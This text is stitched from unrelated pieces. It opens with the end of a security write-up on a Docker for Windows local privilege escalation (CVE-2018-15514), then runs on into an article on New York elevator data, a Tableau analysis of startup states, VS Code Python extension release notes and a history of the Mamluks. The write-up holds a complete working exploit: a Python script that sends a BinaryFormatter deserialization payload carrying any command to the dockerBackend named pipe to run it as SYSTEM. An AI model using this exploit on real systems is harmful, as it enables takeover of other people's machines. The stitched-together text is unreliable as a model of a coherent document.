Finally, this method calls the BinaryFormatter’s Deserialize on untrusted data leading to code execution as SYSTEM.

Exploitation

Now comes the fun bit. I first needed to create a test user account and place them into the docker-users group. Following that, I launched a command shell under that users privilege.

C:\>net localgroup docker-users test /add
The command completed successfully.

C:\>runas /user:test cmd
Enter the password for test:
Attempting to start cmd as user "target\test" ...

Then, using ysoserial.net I used the BinaryFormatter class as the formatter and used @tiraniddo’sTypeConfuseDelegate gadget chain.

C:\>ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o raw -c "[CMD]" > poc.bin

Obviously, we can’t execute [CMD] so I modified the binary payload to accept any command for my poc. Now, it was simply a matter of testing things out!

Getting SYSTEM via Docker for Windows

Here is the source to the poc:

importsysimportstructiflen(sys.argv)!=2:print"(+) usage %s <cmd>"%sys.argv[0]print"(+) eg: %s \"whoami > c:\\si.txt\""%sys.argv[0]sys.exit(-1)cmd="/c %s"%sys.argv[1]payload="\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x0c\x02\x00"payload+="\x00\x00\x49\x53\x79\x73\x74\x65\x6d\x2c\x20\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34"payload+="\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e\x65\x75\x74"payload+="\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d"payload+="\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x05\x01\x00\x00"payload+="\x00\x84\x01\x53\x79\x73\x74\x65\x6d\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e"payload+="\x73\x2e\x47\x65\x6e\x65\x72\x69\x63\x2e\x53\x6f\x72\x74\x65\x64\x53\x65\x74\x60"payload+="\x31\x5b\x5b\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x6d\x73"payload+="\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e"payload+="\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c"payload+="\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37"payload+="\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x5d\x5d\x04\x00\x00\x00\x05"payload+="\x43\x6f\x75\x6e\x74\x08\x43\x6f\x6d\x70\x61\x72\x65\x72\x07\x56\x65\x72\x73\x69"payload+="\x6f\x6e\x05\x49\x74\x65\x6d\x73\x00\x03\x00\x06\x08\x8d\x01\x53\x79\x73\x74\x65"payload+="\x6d\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x47\x65\x6e\x65\x72\x69"payload+="\x63\x2e\x43\x6f\x6d\x70\x61\x72\x69\x73\x6f\x6e\x43\x6f\x6d\x70\x61\x72\x65\x72"payload+="\x60\x31\x5b\x5b\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x6d"payload+="\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e\x30"payload+="\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e\x65\x75\x74\x72\x61"payload+="\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62\x37"payload+="\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x5d\x5d\x08\x02\x00\x00"payload+="\x00\x02\x00\x00\x00\x09\x03\x00\x00\x00\x02\x00\x00\x00\x09\x04\x00\x00\x00\x04"payload+="\x03\x00\x00\x00\x8d\x01\x53\x79\x73\x74\x65\x6d\x2e\x43\x6f\x6c\x6c\x65\x63\x74"payload+="\x69\x6f\x6e\x73\x2e\x47\x65\x6e\x65\x72\x69\x63\x2e\x43\x6f\x6d\x70\x61\x72\x69"payload+="\x73\x6f\x6e\x43\x6f\x6d\x70\x61\x72\x65\x72\x60\x31\x5b\x5b\x53\x79\x73\x74\x65"payload+="\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20"payload+="\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c"payload+="\x74\x75\x72\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63"payload+="\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33"payload+="\x34\x65\x30\x38\x39\x5d\x5d\x01\x00\x00\x00\x0b\x5f\x63\x6f\x6d\x70\x61\x72\x69"payload+="\x73\x6f\x6e\x03\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65"payload+="\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x09"payload+="\x05\x00\x00\x00\x11\x04\x00\x00\x00\x02\x00\x00\x00\x06\x06\x06\x07\x00\x00\x00"payload+="\x03\x63\x6d\x64\x04\x05\x00\x00\x00\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c"payload+="\x65\x67\x61\x74\x65\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f"payload+="\x6c\x64\x65\x72\x03\x00\x00\x00\x08\x44\x65\x6c\x65\x67\x61\x74\x65\x07\x6d\x65"payload+="\x74\x68\x6f\x64\x30\x07\x6d\x65\x74\x68\x6f\x64\x31\x03\x03\x03\x30\x53\x79\x73"payload+="\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65\x53\x65\x72\x69\x61\x6c\x69\x7a"payload+="\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x2b\x44\x65\x6c\x65\x67\x61\x74\x65"payload+="\x45\x6e\x74\x72\x79\x2f\x53\x79\x73\x74\x65\x6d\x2e\x52\x65\x66\x6c\x65\x63\x74"payload+="\x69\x6f\x6e\x2e\x4d\x65\x6d\x62\x65\x72\x49\x6e\x66\x6f\x53\x65\x72\x69\x61\x6c"payload+="\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x2f\x53\x79\x73\x74\x65\x6d"payload+="\x2e\x52\x65\x66\x6c\x65\x63\x74\x69\x6f\x6e\x2e\x4d\x65\x6d\x62\x65\x72\x49\x6e"payload+="\x66\x6f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65"payload+="\x72\x09\x08\x00\x00\x00\x09\x09\x00\x00\x00\x09\x0a\x00\x00\x00\x04\x08\x00\x00"payload+="\x00\x30\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65\x53\x65\x72"payload+="\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x2b\x44\x65\x6c"payload+="\x65\x67\x61\x74\x65\x45\x6e\x74\x72\x79\x07\x00\x00\x00\x04\x74\x79\x70\x65\x08"payload+="\x61\x73\x73\x65\x6d\x62\x6c\x79\x06\x74\x61\x72\x67\x65\x74\x12\x74\x61\x72\x67"payload+="\x65\x74\x54\x79\x70\x65\x41\x73\x73\x65\x6d\x62\x6c\x79\x0e\x74\x61\x72\x67\x65"payload+="\x74\x54\x79\x70\x65\x4e\x61\x6d\x65\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65"payload+="\x0d\x64\x65\x6c\x65\x67\x61\x74\x65\x45\x6e\x74\x72\x79\x01\x01\x02\x01\x01\x01"payload+="\x03\x30\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65\x53\x65\x72"payload+="\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x64\x65\x72\x2b\x44\x65\x6c"payload+="\x65\x67\x61\x74\x65\x45\x6e\x74\x72\x79\x06\x0b\x00\x00\x00\xb0\x02\x53\x79\x73"payload+="\x74\x65\x6d\x2e\x46\x75\x6e\x63\x60\x33\x5b\x5b\x53\x79\x73\x74\x65\x6d\x2e\x53"payload+="\x74\x72\x69\x6e\x67\x2c\x20\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72"payload+="\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72"payload+="\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79"payload+="\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30"payload+="\x38\x39\x5d\x2c\x5b\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20"payload+="\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e"payload+="\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e\x65\x75\x74\x72"payload+="\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62"payload+="\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x5d\x2c\x5b\x53\x79"payload+="\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f"payload+="\x63\x65\x73\x73\x2c\x20\x53\x79\x73\x74\x65\x6d\x2c\x20\x56\x65\x72\x73\x69\x6f"payload+="\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72\x65\x3d\x6e"payload+="\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79\x54\x6f\x6b"payload+="\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30\x38\x39\x5d"payload+="\x5d\x06\x0c\x00\x00\x00\x4b\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56\x65\x72"payload+="\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72"payload+="\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79"payload+="\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30"payload+="\x38\x39\x0a\x06\x0d\x00\x00\x00\x49\x53\x79\x73\x74\x65\x6d\x2c\x20\x56\x65\x72"payload+="\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74\x75\x72"payload+="\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b\x65\x79"payload+="\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34\x65\x30"payload+="\x38\x39\x06\x0e\x00\x00\x00\x1a\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e"payload+="\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x06\x0f\x00\x00\x00\x05"payload+="\x53\x74\x61\x72\x74\x09\x10\x00\x00\x00\x04\x09\x00\x00\x00\x2f\x53\x79\x73\x74"payload+="\x65\x6d\x2e\x52\x65\x66\x6c\x65\x63\x74\x69\x6f\x6e\x2e\x4d\x65\x6d\x62\x65\x72"payload+="\x49\x6e\x66\x6f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c"payload+="\x64\x65\x72\x07\x00\x00\x00\x04\x4e\x61\x6d\x65\x0c\x41\x73\x73\x65\x6d\x62\x6c"payload+="\x79\x4e\x61\x6d\x65\x09\x43\x6c\x61\x73\x73\x4e\x61\x6d\x65\x09\x53\x69\x67\x6e"payload+="\x61\x74\x75\x72\x65\x0a\x53\x69\x67\x6e\x61\x74\x75\x72\x65\x32\x0a\x4d\x65\x6d"payload+="\x62\x65\x72\x54\x79\x70\x65\x10\x47\x65\x6e\x65\x72\x69\x63\x41\x72\x67\x75\x6d"payload+="\x65\x6e\x74\x73\x01\x01\x01\x01\x01\x00\x03\x08\x0d\x53\x79\x73\x74\x65\x6d\x2e"payload+="\x54\x79\x70\x65\x5b\x5d\x09\x0f\x00\x00\x00\x09\x0d\x00\x00\x00\x09\x0e\x00\x00"payload+="\x00\x06\x14\x00\x00\x00\x3e\x53\x79\x73\x74\x65\x6d\x2e\x44\x69\x61\x67\x6e\x6f"payload+="\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73\x73\x20\x53\x74\x61\x72\x74\x28"payload+="\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x53\x79\x73\x74\x65"payload+="\x6d\x2e\x53\x74\x72\x69\x6e\x67\x29\x06\x15\x00\x00\x00\x3e\x53\x79\x73\x74\x65"payload+="\x6d\x2e\x44\x69\x61\x67\x6e\x6f\x73\x74\x69\x63\x73\x2e\x50\x72\x6f\x63\x65\x73"payload+="\x73\x20\x53\x74\x61\x72\x74\x28\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e"payload+="\x67\x2c\x20\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x29\x08\x00\x00"payload+="\x00\x0a\x01\x0a\x00\x00\x00\x09\x00\x00\x00\x06\x16\x00\x00\x00\x07\x43\x6f\x6d"payload+="\x70\x61\x72\x65\x09\x0c\x00\x00\x00\x06\x18\x00\x00\x00\x0d\x53\x79\x73\x74\x65"payload+="\x6d\x2e\x53\x74\x72\x69\x6e\x67\x06\x19\x00\x00\x00\x2b\x49\x6e\x74\x33\x32\x20"payload+="\x43\x6f\x6d\x70\x61\x72\x65\x28\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e"payload+="\x67\x2c\x20\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x29\x06\x1a\x00"payload+="\x00\x00\x32\x53\x79\x73\x74\x65\x6d\x2e\x49\x6e\x74\x33\x32\x20\x43\x6f\x6d\x70"payload+="\x61\x72\x65\x28\x53\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x53"payload+="\x79\x73\x74\x65\x6d\x2e\x53\x74\x72\x69\x6e\x67\x29\x08\x00\x00\x00\x0a\x01\x10"payload+="\x00\x00\x00\x08\x00\x00\x00\x06\x1b\x00\x00\x00\x71\x53\x79\x73\x74\x65\x6d\x2e"payload+="\x43\x6f\x6d\x70\x61\x72\x69\x73\x6f\x6e\x60\x31\x5b\x5b\x53\x79\x73\x74\x65\x6d"payload+="\x2e\x53\x74\x72\x69\x6e\x67\x2c\x20\x6d\x73\x63\x6f\x72\x6c\x69\x62\x2c\x20\x56"payload+="\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2c\x20\x43\x75\x6c\x74"payload+="\x75\x72\x65\x3d\x6e\x65\x75\x74\x72\x61\x6c\x2c\x20\x50\x75\x62\x6c\x69\x63\x4b"payload+="\x65\x79\x54\x6f\x6b\x65\x6e\x3d\x62\x37\x37\x61\x35\x63\x35\x36\x31\x39\x33\x34"payload+="\x65\x30\x38\x39\x5d\x5d\x09\x0c\x00\x00\x00\x0a\x09\x0c\x00\x00\x00\x09\x18\x00"payload+="\x00\x00\x09\x16\x00\x00\x00\x0a\x0b"# now we patch our payloaddata=bytearray(payload)# patch the sizedata[655:655]=struct.pack(">I",len(cmd))# patch the cmddata[659:659]=cmd# get the size to sendsize=struct.pack("<I",len(data))# get a handle to the NamedPipenp=open(r'\\.\pipe\dockerBackend','w+b')# exploit!np.write(size)np.write(data)# clean upnp.close()

Timeline

You can see Docker’s advisory here, but note that it’s not exactly advising much. However they did obtain CVE-2018-15514 for referencing this vulnerability.

Poor advisory to the users of Docker for Windows

Conclusion

This bug doesn't have as high of an impact as regular LPE's due the fact that the user needs to be a member of the docker-users group. However, as shown, this is a common configuration with no official documentation regarding this security boundary.

These vulnerabilities are easy to find and exploit. I suspect that .net deserialization vulnerabilities will become more prevalent as researchers discover the high availability of .net in third party applications. The tools are already here for researchers and attackers to discover them and like their Java counterpart, I believe they will impact a wide variety of third party Windows software, especially in the enterprise space.

Finally, I wish I could say Docker was easier to work with. However when iDefense first reported it, they neglected that they even had a vulnerability and when they finally agreed to develop a patch, they decided to not release an advisory, CVE or credit. This is poor form in 2018, especially for a widely deployed technology.

References

NEW YORK — This is a three-dimensional city — and one that constantly reminds us of that fact. From my mid-rise apartment, in a neighborhood well into the Brooklyn sticks known as Ditmas Park, I have a clear view of Manhattan’s postcard skyscrapers on the horizon at night. As one of this city’s 8.6 million residents, I tend to navigate these three dimensions in a series of gray metal boxes. For my horizontal transportation, save the odd late-night taxi, I ride the subway. For my vertical transit, I ride in elevators.¹

In 1857, still years before the Civil War, the world’s first commercial passenger elevator was installed in New York, in the Haughwout Building, then a five-story department store, at the corner of Broadway and Broome Street in SoHo. The original Haughwout elevator is long gone, but the elevator ignited what The New York Times called a “tall-building revolution,” quite literally shaping the city as we know it. And now the things are everywhere. And they’re remarkably safe: There are only about 30 elevator and escalator deaths in this country each year. About 1,900 people die taking the stairs.

About 150 years after the first elevator, a database of every elevator in New York City appeared on GitHub. The city’s Department of Buildings released it after a Freedom of Information Law request from Noah Veltman, a developer and reporter on the data news team of WNYC, the city’s public radio station. Veltman was good enough to release it to the broader public. When I dug into it, it revealed a city that’s defined as much by its verticality as it is by its pizza.

“Elevators really do determine, in multiple ways, how tall a building will be and what our skyline looks like,” Carol Willis, the founder and director of the Skyscraper Museum in New York, told me.

As of 2015, there were more than 76,000 elevator devices in New York — basically anything that moves people up and down. The average listed capacity of these is about 2,750 pounds, which means that approximately 18 percent of the city’s adult population could be safely suspended in mechanical elevation or descension at any given moment, if they were so moved.² There are many more miles of elevator shafts (about 1,570, assuming a reasonable average floor height, etc.) than there are miles of subway tracks (about 840).

Everybody in New York seems to have an elevator story. My colleague Clare Malone once had to be cut out of one by the Fire Department. My ex-girlfriend had to be pried out of one by a good Samaritan. I, having somewhat better elevator luck (knock on wood), once rode one with Adam Sandler. The excellent, New York-set TV show “Louie” aired a six-part suite of episodes in 2014 that were each called, simply, “Elevator.”

Elevators are ubiquitous in New York, and so entwined with how the city functions, that merely plotting their latitudes and longitudes yields a fairly serviceable map of the city (except for Staten Island, which as usual gets the shaft³). After plotting elevator devices alone,⁴ you can still make out parks, cemeteries, major thoroughfares, commercial centers, inhabited East River islands and borough boundaries.

It should be noted briefly here that this data set, while big and nice and public and free, teaches valuable lessons in empirical caution. For whatever reason,⁵ the very official-looking data from the very authoritative-sounding Department of Buildings contains errors. A building on 18th Street, it claims, has an elevator that goes up to the 912th floor, more than five times the highest floor in the tallest building in the world. It would soar more than 1.5 miles up into the sky. Another, on the Avenue of the Americas, is said to go about 80 mph — but the world’s fastest elevators go less than 40. One passenger elevator in Queens claims a maximum capacity of just 2.5 pounds, or about four subway rats.

But onward we press — minding our step as we do.

Some of the outlying entries in the data set are indeed legitimate. The Barclays Center, home to the Brooklyn Nets and New York Islanders, has not one but two freight elevators that each have a capacity of 80,000 pounds (13 or so elephants). And an elevator at the Empire State Building does indeed go to the 102nd floor.

But most New York elevators, my own apartment building’s included, are far more mundane and top out at the sixth floor. The six-story building is the staple of New York housing stock. There are good reasons for this, one of which is geological. Nearly all New York City’s drinking water flows down from reservoirs and through aqueducts from upstate without any pumping — gravity does the work. A building taller than six stories requires a water tower and its own pumps to provide suitable water pressure to tenants on the higher floors, and that’s a costly pain in the neck to build and maintain. Also, new buildings five stories or taller at least since 1968 have been generally required by the city to have an elevator, although some five-story buildings are exempt. So six floors is tall enough to need an elevator but short enough to avoid needing a water tower and other extra construction expense.

“Elevators are really the most important factor in determining the economic height of the building,” Willis said. People don’t like to climb dozens of flights of stairs. Elevators allow one to build higher — and better, faster, more efficient elevators higher still.

The elevator made its public debut in SoHo, but of course has spread to every corner of the city by now. The majority (57 percent) are in Manhattan. Brooklyn claims 18 percent of them, Queens 13 percent and the Bronx 10. Five Manhattan ZIP codes, nearly all in or around Midtown, are members of the elite 2,000-elevator club.

Elevator technology is still evolving, and engineers have always had to deal with riders’ fears and expectations to convince them the devices are worth riding. “The main thing was to assure people that they wouldn’t plummet to their deaths,” Willis said about early elevators. The Otis elevator in the Haughwout building emphasized this with an automatic safety device. Nowadays, the trick is convincing people that they won’t need to wait more than 30 seconds to ascend. Innovations like elevator banks and destination dispatch have worked to accomplish that.

On the whole, though, the elevator is an unquestionable success story. Citywide, elevators are taken on something like 4 million rides on the average day. And now, thanks to the data revolution, we have a bird’s eye view of their place in the city. Maybe Willy Wonka’s Great Glass Elevator exists, after all — and maybe it’s called data. Grandpa, our town looks so pretty from up here.

Data analysis can bring a competitive advantage to your business, assisting in a better understanding of the product, customers, and competitors. An integral part of data analysis is data visualization. It can provide valuable information and help with its comprehension and correct interpretation.

Today we will perform exploratory data analysis that gives an interesting insight into a small, simple dataset. The purpose of this article is to find states with the most active startup ecosystems.

Data introduction

For this analysis, we used data from Angel.co. Angel.co is a platform where job-seekers can look for a job at startups, as well as investors and companies can find each other for partnership. Using data from Angel.co for this kind of task has several advantages in comparison to using data from other sources, in particular:

• It is one of the biggest platforms for startups, where you can find information about a large number of startups.
• It is a free platform. Information is publicly available, and you don’t need to pay to get access to it.
• Good hierarchy, meaning that you can go deeper and get more granular information on particular states that interest you.

So, to start off, we created an Excel file with data that we will later analyze in Tableau. We tested many hypotheses, and only one of them showed a good result. Below, we describe our best hypotheses with the explanations to all of the steps.

Angel.co provides 4 measures for each state, namely:

1. Companies - the number of startups in the state.
2. Investors - the number of investors that invest in companies.
3. Followers - the number of followers that interested in companies.
4. Jobs - the number of jobs that are offered by companies in the state.

Exploratory data analysis

We are looking for the states with the best conditions for the development of startups, so we are most interested in Companies and Jobs measures.

To begin with, let’s build a bar chart. As you can see, there are only two states with a significantly larger number of companies comparing to other states: California and New York. And the number of jobs is also high there.

As a matter of fact, California is a leading IT area in the world where Silicon Valley is located, and New York is a leading business hub in the USA. So, these two states will be our target states for now.

These views are not representative. It is hard to see the difference between states with a small amount of companies. So, we plot absolute values of Сompanies & Jobs as a scatterplot, which helps to see the correlation between variables and clustering effects.

All of the states are situated near the diagonal line. And the further they are from the beginning of the axis, the more interesting they are for us. Our two target states are outliers in this scatter plot. Because of them, it is hard to see the other ones.

However, the picture still has some issues. We can’t understand if there are some states with a small number of companies that can be suitable for our goals. So we decide to weight measures by the number of companies. In this case, we can see the states with a small number of companies, but with a big amount of jobs per company. This means that, despite the small number of companies in this state, the companies are very active and interesting for us.

Below, you can see the results of those calculations. Bar charts represent absolute values and dots represent weighted values.

At this time, we also use scatter plot; however, we use weighted values on it: Jobs per company on Y-axis & Investors per company on X-axis. Now, everything looks in its place. At the top left corner, we have our target states. They are almost on the Y-axis. So all states which are close to Y-axis also interest us.

As a result, the most interesting states are New York, California, Massachusetts, District of Columbia, Washington, Illinois, New Jersey, Colorado and others, highlighted in blue.

Conclusion

In this post, we performed an exploratory data analysis and found the states with the best startup ecosystems. We showed you how to distinguish inconspicuous at first glance states against the background of the dominating California and New York. With the help of basic visualizations, we retrieved useful information from a simple dataset using a small amount of data for every state.

We are pleased to announce that the August 2018 release of the Python Extension for Visual Studio Code is now available. You can download the Python extension from the marketplace, or install it directly from the extension gallery in Visual Studio Code. You can learn more about Python support in Visual Studio Code in the VS Code documentation.

In this release we have closed a total of 38 issues including the stable release of our ptvsd 4 debugger, improvements to the language server preview, and other fixes.

In this release we are updating all users to the ptvsd 4.1.1 version of our Python debugger, providing a significant improvement to debugging performance and stability over the previous ptvsd 3.0 version. We originally announced an opt-in preview of ptvsd 4 in the February release of the Python extension, and have been continuing to improve on it based on user feedback. The new debug engine is built on top of the open source pydevd, which has allowed us to take advantage of its superior performance and support for third party libraries.

The new Python debugger supports the Logpoints feature added in the March iteration of VS Code. Logpoints allow you to essentially add print statements without having to stop execution. You can right-click on the margin and select "Add Logpoint...", and then type in your message:

Remote debugging is easier to use and improved; previously you had to install the exact version of ptvsd used in VS Code on the remote server, and you needed to modify your code to enable the debugger to attach.

Now you can install any 4.x version of ptvsd and can enable attach from the command line. To install ptvsd and start remote debugging from the command line:

pip install --upgrade ptvsd
python3 -m ptvsd --host 1.2.3.4 --port 3000 -m myproject

Once the server starts you can attach to it from VS Code by modifying your launch.json file and setting the host and port number in the attach configuration. Check out our updated remote debugging documentation for more information.

We are continuing to make improvements to the debugger, so stay tuned in our future releases.

In the July release of the Python extension we added a preview of the Microsoft Python Language Server, our Python analysis engine from Visual Studio hosted inside of VS Code. This allowed us to provide faster & richer completions including support for typeshed definitions. We have made the following improvements in this release:

1. Language server now populates document outline with all symbols instead of just top-level ones. (#2050)
2. Fixed issue in the language server when documentation for a function always produced "Documentation is still being calculated, please try again soon". (#2179)
3. Fix null reference exception in the language server causing server initialization to fail. The exception happened when search paths contained a folder that did not exist. (#2017)
4. Fixed language server issue when it could enter infinite loop reloading modules. (#2207)
5. Language server now correctly handles with statement when __enter__ is declared in a base class. (#2240)
6. Fixed issue in the language server when typing dot under certain conditions produced null reference exception. (#2262)
7. Language server now correctly merges data from typeshed and the Python library. (#2345)
8. Code lenses now appear for unit tests when using the language server (#1948)

We have also added small enhancements and fixed issues requested by users that should improve your experience working with Python in Visual Studio Code. The full list of improvements is listed in our changelog, some notable improvements are:

1. Ensure test count values in the status bar represent the correct number of tests that were discovered and run. (#2143)
2. Ensure workspace pipenv environment is not labeled as a virtual env. (#2223)
3. Fix visualstudio_py_testLauncher to stop breaking out of test discovery too soon. (#2241)
4. Fix error when switching from new language server to the old Jedi language server. (#2281)
5. Ensure stepping out of debugged code does not take user into PTVSD debugger code. (#767)

Be sure to download the Python extension for VS Code now to try out the above improvements. If you run into any issues be sure to file an issue on the Python VS Code GitHub page.

The Mamluks ruled Egypt and Syria from 1250 until 1517, when their dynasty was extinguished by the Ottomans. But Mamluks had first appeared in the Abbasid caliphate in the ninth century and even after their overthrow by the Ottomans they continued to form an important part of Egyptian Islamic society and existed as an influential group until the 19th century. They destroyed the Crusader kingdoms of Outremer, and saved Syria, Egypt and the holy places of Islam from the Mongols. They made Cairo the dominant city of the Islamic world in the later Middle Ages, and under these apparently unlettered soldier-statesmens’ rule, craftsmanship, architecture and scholarship flourished. Yet the dynasty remains virtually unknown to many in the West.

The dynasty had two phases. From 1250 to 1381 the Bahri clique produced the Mamluk Sultans; from 1382 until 1517 the Burgi Mamluks were dominant. These groups were named after the principal regiments provided by the Mamluks for the last Ayyubid sultan as-Salih whom they served before overthrowing in 1250; the Bahirya or River Island regiment, based on a river island in the centre of Cairo and the Burgi or Tower regiment. 

The word Mamluk means ‘owned’ and the Mamluks were not native to Egypt but were always slave soldiers, mainly Qipchak Turks from Central Asia. In principle (though not always in practice) a Mamluk could not pass his property or title to his son, indeed sons were in theory denied the opportunity to serve in Mamluk regiments, so the group had to be constantly replenished from outside sources. The Bahri Mamluks were mainly natives of southern Russia and the Burgi comprised chiefly of Circassians from the Caucasus. As steppe people, they had more in common with the Mongols than with the peoples of Syria and Egypt among whom they lived. And they kept their garrisons distinct, not mixing with the populace in the territories. The contemporary Arab historian Abu Shama noted after the Mamluk victory over the Mongols at Ayn Jalut in 1260 that, ‘the people of the steppe had been destroyed by the people of the steppe’. 

Boys of about 13 would be captured from areas to the north of the Persian empire, and trained to become an elite force for the personal use of the sultan or higher lords. The Arabic word Ghulam (boy) was sometimes employed for the bodyguards they would become. The boys would be sent by the caliph or sultan to enforce his rule as far afield as Spain (Venice and Genoa were major players in their transportation despite Papal interdictions) and sold to the commanders of the Islamic governments of the region. Under their new masters they were manumitted, converted to Islam, and underwent intensive military training. 

Islamic society, like that of medieval Christendom, took the form of a theoretical pyramid of fealty with the king or sultan at the top and numerous petty lords at its base with each lord above them holding rights of loyalty over them. In the military societies of the 13th century higher lords or amirs maintained a large number of Mamluks, and the sultan held the most. During the Mamluk Sultanate, succession and the power struggles to dispute succession were based chiefly on the size of a candidate’s powerbase, in terms of numbers of men in arms and client lords, that he could muster. 

The Mamluks, who had been taken from their families in their youth and had no ties of kin in their new homelands, were personally dependent on their master. This gave the Mamluk state, divorced as it was from its parent society, a solidity that allowed it to survive the tensions of tribalism and personal ambition, through establishment of interdependency between the lower orders and sergeants and the higher lords. 

And at the centre Mamluk politics were bloody and brutal. Mamluks were not supposed to be able to inherit wealth or power beyond their own generation but attempts to create lineage did occur and every succession was announced by internecine struggles. Purges of higher lords and rivals were common and sultans commonly used impalement and crucifixion to punish those suspected of acts of lèse majesté or intrigue. 

